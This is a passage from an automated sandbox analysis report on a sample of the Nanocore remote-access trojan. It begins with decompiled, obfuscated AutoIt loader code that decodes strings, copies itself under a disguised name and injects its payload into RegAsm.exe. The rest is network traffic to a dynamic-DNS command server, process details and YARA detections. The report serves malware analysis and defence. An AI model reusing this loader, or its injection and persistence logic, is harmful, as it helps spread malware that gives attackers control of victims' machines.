(ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,3..5,..38..,3..1..,..18,3..1,..27,3..0.." , ".." ) ) ) ENDFUNC FUNC ZPVYEEXEUEWT () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,..3..5,..38,..31..,..23..,44..,..3..5,4..6,3..1.." , ".." ) ) ) ENDFUNC FUNC YYEUJPRYPKCM () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("9,40,31..,..46,7..,3..1..,46.." , ".." ) ) ) ENDFUNC FUNC IGCFQUUWMEAF () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("9,..4..5,1,3..0..,3..9,..3..5,..4..0.." , ".." ) ) ) ENDFUNC FUNC CJCCIDDEPTLC () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("1..3,..45..,33,..2..,..41,5..0.." , ".." ) ) ) ENDFUNC FUNC ZPLPQGYBGRDG () GLOBAL $1300820860 = 256356752 GLOBAL $T34YZVYIB3 = 3599293 FOR $E = 0 TO 2828683 MOD (3030196 , 3600226 ) IF $1300820860 = 176683708 THEN #endregion EXITLOOP STRING (1287972 + 4294142251 ) ENDIF IF $1300820860 = 256356752 THEN RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("1..6,..4..4..,4..1..,29..,..3..1,..45,..45,3..,3..8..,..4..1,..45,..31.." , ".." ) ) ) DIM $TJEWRRKJAQ96YDEBIBZV = 434386 $1300820860 = 176683708 ISBOOL (2151701 + 4291471136 + 851125 ) ENDIF NEXT ENDFUNC FUNC QHMGHXJZKQDS () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("16,4..4,..41..,2..9..,..3..1..,..4..5,..4..5,5..,..50,35,..45,..4..6,4..5" , ".." ) ) ) ENDFUNC GLOBAL $1300820860 = 256356752 GLOBAL $MI14JTB1SP = 2992520 FOR $E = 0 TO 3837253 IF $1300820860 = 176683708 THEN #endregion EXITLOOP ENDIF IF $1300820860 = 256356752 THEN #region nsziBMbqjH PTR (3821692 * 2598776 + 4292133915 * 233491 ) $1300820860 = 176683708 STRING ("Yzk4VX0LZuJBt2qbtlaAepvgq9LqXiBJ96lIam" ) ENDIF NEXT FUNC RQBFMRVGXJYI () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("1..8,..27,..4..0..,30..,41,..39.." , ".." ) ) ) ENDFUNC FUNC HGMGWWTPDNOR () GLOBAL $1300820860 = 256356752 GLOBAL $BKLQZCBPLW = 492947 FOR $E = 0 TO 3060378 IF $1300820860 = 176683708 THEN RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("18,31..,..3..3..,23..,4..4,3..5,..4..6..,31" , ".." ) ) ) EXITLOOP DIM $YR3ACXQSBGBXZBI46ETW = 3229433 * 3554240 * 819568 + 2784574 + 4292975588 ENDIF IF $1300820860 = 256356752 THEN #endregion CHR (142645 ) $1300820860 = 176683708 ENDIF NEXT ENDFUNC FUNC RMOEECIWZOYF () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("1..9..,..3..4..,..3..1,..3..8,..38..,..5,..50..,31,29..,..4..7,46..,..3..1" , ".." ) ) ) ENDFUNC FUNC QDGSBIXASIOK () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("1..9..,..38,31..,3..1..,..4..2.." , ".." ) ) ) ENDFUNC FUNC MSSFBHBPZKOB () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("19..,46,..44,3..5,..4..0,3..3..,9..,..4..0,..19..,..46,..4..4.." , ".." ) ) ) ENDFUNC FUNC ZEBJKFZIPAFI () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("21,2..,..41..,..4..7..,4..0..,3..0.." , ".." ) ) ) ENDFUNC FUNC XZRGVRFNYRGX () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2..3..,3..5,..40,..5..,..50..,..35..,45,..4..6,45" , ".." ) ) ) ENDFUNC FUNC ZVTZJDNXHRPQQIM ($STR ) GLOBAL $113519199 = 256356752 GLOBAL $JVAIKJVNZJ = 3556081 FOR $E = 0 TO 482371 CHR (3033401 ) IF $113519199 = 176683708 THEN LOCAL $SPLIT = STRINGSPLIT ($ALPHABET , "" ) $113519199 = 1300820860 ENDIF IF $113519199 = 256356752 THEN LOCAL $ALPHABET = LUXBZMCWKPOC ("A..B..CD..EFG..HIJ..K..L..M..NO..PQ..RS..T..U..V..W..XY..Zabc..de..fghi..jkl..mno..p..q..r..s..t..u..v..wx..y..z0..1..2..34..5..6..78..9.." , ".." ) $113519199 = 176683708 RANDOM (3170570 ) ENDIF IF $113519199 = 1203322726 THEN LOCAL $RESULT ISPTR ("MdWUnM2DmvZ9vMRlMDwEmfG5K8YyzTWuomWSqd0kvm11oHphqKe2zZMGF0joYDdDIDVj095INmj9oORdTQhZN45yJplA4Kv2jws" ) EXITLOOP DIM $RQQEONQMS0IGFHVOZOIW = 2269440 ENDIF IF $113519199 = 1300820860 THEN LOCAL $STRINGSPLITTED = STRINGSPLIT ($STR , "," ) ISSTRING (162997 + 3383337 * 1470645 * 1064176 ) $113519199 = 1203322726 PTR ("QSS66vrYfoF4GNlz" ) ISSTRING ("lwzXBDmZ3TEfR80NLNBm17KV5tSU0eSx6sDusjE2e8lFbY0OvV5cb99oWO1hVB9ZahjyEEvCjJh2VfThCdyfjOv7toINswhM9wE4" ) ENDIF DIM $YB3B1GCR5UORC3OVVLEQ = 3765422 * 671547 * 1819674 + 4291390693 + 4292645635 * 1791171 + 3593431 NEXT FOR $I = "1" TO UBOUND ($STRINGSPLITTED ) - "1" $RESULT &= $SPLIT [$STRINGSPLITTED [$I ] ] NEXT RETURN $RESULT ENDFUNC DIM $IXPAPBPRCQQTJUQXZZQGEHEIOBIJTCJK LOCAL $STARTUPDIR = @USERPROFILEDIR & "\hdwwiz" LOCAL $BOOL = @SCRIPTDIR = $STARTUPDIR "True" "False" UCZPRNKTQP ("WinSAT" , "DiagnosticsHub.StandardCollector.Service.exe" ) $IXPAPBPRCQQTJUQXZZQGEHEIOBIJTCJK = URQHLYEYWJ ("0x494D4A504443546C" , "0x706D41484E505A786C49734E69595578575566536C475879594457574F615A67" , "10" ) DIM $LIUIVFNQUPEO = EXECUTE ("@HomeDrive & "\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"" ) DIM $EMYXOKTBATHL = EXECUTE ("@HomeDrive & "\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"" ) IF FILEEXISTS ($LIUIVFNQUPEO ) THEN RUNPE ($LIUIVFNQUPEO , $IXPAPBPRCQQTJUQXZZQGEHEIOBIJTCJK , FALSE , TRUE ) ELSEIF FILEEXISTS ($EMYXOKTBATHL ) THEN RUNPE ($EMYXOKTBATHL , $IXPAPBPRCQQTJUQXZZQGEHEIOBIJTCJK , FALSE , TRUE ) ENDIF DJXLPTMAOK () FUNC DJXLPTMAOK ()

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 19, 2020 01:52:30.663995028 CET	49715	20377	192.168.2.7	87.65.28.27
Nov 19, 2020 01:52:33.672907114 CET	49715	20377	192.168.2.7	87.65.28.27
Nov 19, 2020 01:52:39.689816952 CET	49715	20377	192.168.2.7	87.65.28.27
Nov 19, 2020 01:52:50.012203932 CET	49727	20377	192.168.2.7	87.65.28.27
Nov 19, 2020 01:52:53.018296003 CET	49727	20377	192.168.2.7	87.65.28.27
Nov 19, 2020 01:52:59.034399986 CET	49727	20377	192.168.2.7	87.65.28.27
Nov 19, 2020 01:53:08.341140985 CET	49730	20377	192.168.2.7	87.65.28.27
Nov 19, 2020 01:53:11.332464933 CET	49730	20377	192.168.2.7	87.65.28.27
Nov 19, 2020 01:53:17.426786900 CET	49730	20377	192.168.2.7	87.65.28.27
Nov 19, 2020 01:53:42.495999098 CET	49748	20377	192.168.2.7	87.65.28.27
Nov 19, 2020 01:53:45.507028103 CET	49748	20377	192.168.2.7	87.65.28.27
Nov 19, 2020 01:53:51.523511887 CET	49748	20377	192.168.2.7	87.65.28.27
Nov 19, 2020 01:53:59.261042118 CET	49751	20377	192.168.2.7	87.65.28.27
Nov 19, 2020 01:54:02.274269104 CET	49751	20377	192.168.2.7	87.65.28.27
Nov 19, 2020 01:54:08.290158033 CET	49751	20377	192.168.2.7	87.65.28.27
Nov 19, 2020 01:54:17.969947100 CET	49753	20377	192.168.2.7	87.65.28.27
Nov 19, 2020 01:54:20.978811026 CET	49753	20377	192.168.2.7	87.65.28.27
Nov 19, 2020 01:54:26.994798899 CET	49753	20377	192.168.2.7	87.65.28.27

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 19, 2020 01:52:20.556395054 CET	58052	53	192.168.2.7	8.8.8.8
Nov 19, 2020 01:52:20.569623947 CET	53	58052	8.8.8.8	192.168.2.7
Nov 19, 2020 01:52:21.619240999 CET	54008	53	192.168.2.7	8.8.8.8
Nov 19, 2020 01:52:21.631486893 CET	53	54008	8.8.8.8	192.168.2.7
Nov 19, 2020 01:52:23.014729023 CET	59451	53	192.168.2.7	8.8.8.8
Nov 19, 2020 01:52:23.027920961 CET	53	59451	8.8.8.8	192.168.2.7
Nov 19, 2020 01:52:24.206804037 CET	52914	53	192.168.2.7	8.8.8.8
Nov 19, 2020 01:52:24.219973087 CET	53	52914	8.8.8.8	192.168.2.7
Nov 19, 2020 01:52:25.068202019 CET	64569	53	192.168.2.7	8.8.8.8
Nov 19, 2020 01:52:25.081556082 CET	53	64569	8.8.8.8	192.168.2.7
Nov 19, 2020 01:52:30.631275892 CET	52816	53	192.168.2.7	8.8.8.8
Nov 19, 2020 01:52:30.651945114 CET	53	52816	8.8.8.8	192.168.2.7
Nov 19, 2020 01:52:31.536803007 CET	50781	53	192.168.2.7	8.8.8.8
Nov 19, 2020 01:52:31.549947977 CET	53	50781	8.8.8.8	192.168.2.7
Nov 19, 2020 01:52:32.238909006 CET	54230	53	192.168.2.7	8.8.8.8
Nov 19, 2020 01:52:32.252537012 CET	53	54230	8.8.8.8	192.168.2.7
Nov 19, 2020 01:52:32.734786034 CET	54911	53	192.168.2.7	8.8.8.8
Nov 19, 2020 01:52:32.773921967 CET	53	54911	8.8.8.8	192.168.2.7
Nov 19, 2020 01:52:33.084186077 CET	49958	53	192.168.2.7	8.8.8.8
Nov 19, 2020 01:52:33.097460985 CET	53	49958	8.8.8.8	192.168.2.7
Nov 19, 2020 01:52:34.630846977 CET	50860	53	192.168.2.7	8.8.8.8
Nov 19, 2020 01:52:34.647241116 CET	53	50860	8.8.8.8	192.168.2.7
Nov 19, 2020 01:52:35.551826000 CET	50452	53	192.168.2.7	8.8.8.8
Nov 19, 2020 01:52:35.564193010 CET	53	50452	8.8.8.8	192.168.2.7
Nov 19, 2020 01:52:36.234267950 CET	59730	53	192.168.2.7	8.8.8.8
Nov 19, 2020 01:52:36.247414112 CET	53	59730	8.8.8.8	192.168.2.7
Nov 19, 2020 01:52:36.915190935 CET	59310	53	192.168.2.7	8.8.8.8
Nov 19, 2020 01:52:36.928962946 CET	53	59310	8.8.8.8	192.168.2.7
Nov 19, 2020 01:52:38.098931074 CET	51919	53	192.168.2.7	8.8.8.8
Nov 19, 2020 01:52:38.111999035 CET	53	51919	8.8.8.8	192.168.2.7
Nov 19, 2020 01:52:39.109504938 CET	64296	53	192.168.2.7	8.8.8.8
Nov 19, 2020 01:52:39.122490883 CET	53	64296	8.8.8.8	192.168.2.7
Nov 19, 2020 01:52:49.947350025 CET	56680	53	192.168.2.7	8.8.8.8
Nov 19, 2020 01:52:49.960371971 CET	53	56680	8.8.8.8	192.168.2.7
Nov 19, 2020 01:52:53.468233109 CET	58820	53	192.168.2.7	8.8.8.8
Nov 19, 2020 01:52:53.480763912 CET	53	58820	8.8.8.8	192.168.2.7
Nov 19, 2020 01:53:08.317718983 CET	60983	53	192.168.2.7	8.8.8.8
Nov 19, 2020 01:53:08.339587927 CET	53	60983	8.8.8.8	192.168.2.7
Nov 19, 2020 01:53:09.292503119 CET	49247	53	192.168.2.7	8.8.8.8
Nov 19, 2020 01:53:09.311260939 CET	53	49247	8.8.8.8	192.168.2.7
Nov 19, 2020 01:53:09.859353065 CET	52286	53	192.168.2.7	8.8.8.8
Nov 19, 2020 01:53:09.872359991 CET	53	52286	8.8.8.8	192.168.2.7
Nov 19, 2020 01:53:18.666498899 CET	56064	53	192.168.2.7	8.8.8.8
Nov 19, 2020 01:53:18.685097933 CET	53	56064	8.8.8.8	192.168.2.7
Nov 19, 2020 01:53:22.698599100 CET	63744	53	192.168.2.7	8.8.8.8
Nov 19, 2020 01:53:22.711711884 CET	53	63744	8.8.8.8	192.168.2.7
Nov 19, 2020 01:53:23.303586006 CET	61457	53	192.168.2.7	8.8.8.8
Nov 19, 2020 01:53:23.316716909 CET	53	61457	8.8.8.8	192.168.2.7
Nov 19, 2020 01:53:23.870199919 CET	58367	53	192.168.2.7	8.8.8.8
Nov 19, 2020 01:53:23.883336067 CET	53	58367	8.8.8.8	192.168.2.7
Nov 19, 2020 01:53:24.228388071 CET	60599	53	192.168.2.7	8.8.8.8
Nov 19, 2020 01:53:24.244683027 CET	53	60599	8.8.8.8	192.168.2.7
Nov 19, 2020 01:53:24.615070105 CET	59571	53	192.168.2.7	8.8.8.8
Nov 19, 2020 01:53:24.627950907 CET	53	59571	8.8.8.8	192.168.2.7
Nov 19, 2020 01:53:25.234616041 CET	52689	53	192.168.2.7	8.8.8.8
Nov 19, 2020 01:53:25.247924089 CET	53	52689	8.8.8.8	192.168.2.7
Nov 19, 2020 01:53:25.800698996 CET	50290	53	192.168.2.7	8.8.8.8
Nov 19, 2020 01:53:25.814448118 CET	53	50290	8.8.8.8	192.168.2.7
Nov 19, 2020 01:53:25.927921057 CET	60427	53	192.168.2.7	8.8.8.8
Nov 19, 2020 01:53:25.956685066 CET	53	60427	8.8.8.8	192.168.2.7
Nov 19, 2020 01:53:27.075440884 CET	56209	53	192.168.2.7	8.8.8.8
Nov 19, 2020 01:53:27.088359118 CET	53	56209	8.8.8.8	192.168.2.7
Nov 19, 2020 01:53:28.009876013 CET	59582	53	192.168.2.7	8.8.8.8
Nov 19, 2020 01:53:28.022838116 CET	53	59582	8.8.8.8	192.168.2.7
Nov 19, 2020 01:53:28.723932981 CET	60949	53	192.168.2.7	8.8.8.8
Nov 19, 2020 01:53:28.736712933 CET	53	60949	8.8.8.8	192.168.2.7
Nov 19, 2020 01:53:42.481102943 CET	58542	53	192.168.2.7	8.8.8.8
Nov 19, 2020 01:53:42.493982077 CET	53	58542	8.8.8.8	192.168.2.7
Nov 19, 2020 01:53:46.921571970 CET	59179	53	192.168.2.7	8.8.8.8
Nov 19, 2020 01:53:46.955610991 CET	53	59179	8.8.8.8	192.168.2.7
Nov 19, 2020 01:53:52.810319901 CET	60927	53	192.168.2.7	8.8.8.8
Nov 19, 2020 01:53:52.823323965 CET	53	60927	8.8.8.8	192.168.2.7
Nov 19, 2020 01:53:59.238854885 CET	57854	53	192.168.2.7	8.8.8.8
Nov 19, 2020 01:53:59.259284973 CET	53	57854	8.8.8.8	192.168.2.7
Nov 19, 2020 01:54:10.956798077 CET	62026	53	192.168.2.7	8.8.8.8
Nov 19, 2020 01:54:10.969027996 CET	53	62026	8.8.8.8	192.168.2.7
Nov 19, 2020 01:54:17.954452991 CET	59453	53	192.168.2.7	8.8.8.8
Nov 19, 2020 01:54:17.968158007 CET	53	59453	8.8.8.8	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 19, 2020 01:52:30.631275892 CET	192.168.2.7	8.8.8.8	0x9826	Standard query (0)	windowslivesoffice.ddns.net	A (IP address)	IN (0x0001)
Nov 19, 2020 01:52:49.947350025 CET	192.168.2.7	8.8.8.8	0x5348	Standard query (0)	windowslivesoffice.ddns.net	A (IP address)	IN (0x0001)
Nov 19, 2020 01:53:08.317718983 CET	192.168.2.7	8.8.8.8	0xda6f	Standard query (0)	windowslivesoffice.ddns.net	A (IP address)	IN (0x0001)
Nov 19, 2020 01:53:42.481102943 CET	192.168.2.7	8.8.8.8	0x91a6	Standard query (0)	windowslivesoffice.ddns.net	A (IP address)	IN (0x0001)
Nov 19, 2020 01:53:59.238854885 CET	192.168.2.7	8.8.8.8	0xf654	Standard query (0)	windowslivesoffice.ddns.net	A (IP address)	IN (0x0001)
Nov 19, 2020 01:54:17.954452991 CET	192.168.2.7	8.8.8.8	0x60d0	Standard query (0)	windowslivesoffice.ddns.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Nov 19, 2020 01:52:30.651945114 CET	8.8.8.8	192.168.2.7	0x9826	No error (0)	windowslivesoffice.ddns.net	87.65.28.27	A (IP address)	IN (0x0001)
Nov 19, 2020 01:52:49.960371971 CET	8.8.8.8	192.168.2.7	0x5348	No error (0)	windowslivesoffice.ddns.net	87.65.28.27	A (IP address)	IN (0x0001)
Nov 19, 2020 01:53:08.339587927 CET	8.8.8.8	192.168.2.7	0xda6f	No error (0)	windowslivesoffice.ddns.net	87.65.28.27	A (IP address)	IN (0x0001)
Nov 19, 2020 01:53:42.493982077 CET	8.8.8.8	192.168.2.7	0x91a6	No error (0)	windowslivesoffice.ddns.net	87.65.28.27	A (IP address)	IN (0x0001)
Nov 19, 2020 01:53:59.259284973 CET	8.8.8.8	192.168.2.7	0xf654	No error (0)	windowslivesoffice.ddns.net	87.65.28.27	A (IP address)	IN (0x0001)
Nov 19, 2020 01:54:17.968158007 CET	8.8.8.8	192.168.2.7	0x60d0	No error (0)	windowslivesoffice.ddns.net	87.65.28.27	A (IP address)	IN (0x0001)

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: e5bd3238d220c97cd4d6969abb3b33e0.exe PID: 2152 Parent PID: 5632

General

Start time:	01:52:25
Start date:	19/11/2020
Path:	C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe'
Imagebase:	0x9c0000
File size:	1124888 bytes
MD5 hash:	7B00ED250C793C95F4D98C637302FB6F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.255245662.0000000001569000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.255245662.0000000001569000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000000.00000003.255245662.0000000001569000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.254485711.00000000015B3000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.254485711.00000000015B3000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000000.00000003.254485711.00000000015B3000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.254593335.00000000015B3000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.254593335.00000000015B3000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000000.00000003.254593335.00000000015B3000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.254905980.0000000001537000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.254905980.0000000001537000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000000.00000003.254905980.0000000001537000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.256228628.00000000040B2000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.256228628.00000000040B2000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000000.00000003.256228628.00000000040B2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.254259059.0000000001589000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.254259059.0000000001589000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000000.00000003.254259059.0000000001589000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.254233252.0000000001613000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.254233252.0000000001613000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000000.00000003.254233252.0000000001613000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.517282808.00000000014E1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.517282808.00000000014E1000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000000.00000002.517282808.00000000014E1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.517388290.00000000015DF000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.517388290.00000000015DF000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000000.00000002.517388290.00000000015DF000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Chronological Activities

Analysis Process: RegAsm.exe PID: 4560 Parent PID: 2152

General

Start time:	01:52:28
Start date:	19/11/2020
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Imagebase:	0x590000
File size:	53248 bytes
MD5 hash:	529695608EAFBED00ACA9E61EF333A7C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.521308096.0000000003B97000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000001.00000002.521308096.0000000003B97000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.514055091.0000000000402000.00000020.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.514055091.0000000000402000.00000020.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000001.00000002.514055091.0000000000402000.00000020.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.522748241.0000000005210000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000001.00000002.522748241.0000000005210000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.522934984.00000000054B0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000001.00000002.522934984.00000000054B0000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.522934984.00000000054B0000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: dhcpmon.exe PID: 6488 Parent PID: 3292

General

Start time:	01:52:38
Start date:	19/11/2020
Path:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
Imagebase:	0x270000
File size:	53248 bytes
MD5 hash:	529695608EAFBED00ACA9E61EF333A7C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 0%, Metadefender, Browse Detection: 0%, ReversingLabs
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6508 Parent PID: 6488

General

Start time:	01:52:39
Start date:	19/11/2020
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff774ee0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 6976 Parent PID: 3292

General

Start time:	01:52:47
Start date:	19/11/2020
Path:	C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat'
Imagebase:	0x980000
File size:	1124896 bytes
MD5 hash:	E10CD6FAB33374FB1A0002F89D0BFE45
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.302592144.0000000000ED7000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.302592144.0000000000ED7000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.302592144.0000000000ED7000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.332037940.0000000000CDD000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.332037940.0000000000CDD000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.332037940.0000000000CDD000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.330103349.0000000000E21000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.330103349.0000000000E21000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.330103349.0000000000E21000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.302680442.0000000000E4D000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.302680442.0000000000E4D000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.302680442.0000000000E4D000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.329404748.0000000000E53000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.329404748.0000000000E53000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.329404748.0000000000E53000.00000004.00000001.sdmp, Author: Kevin Breen 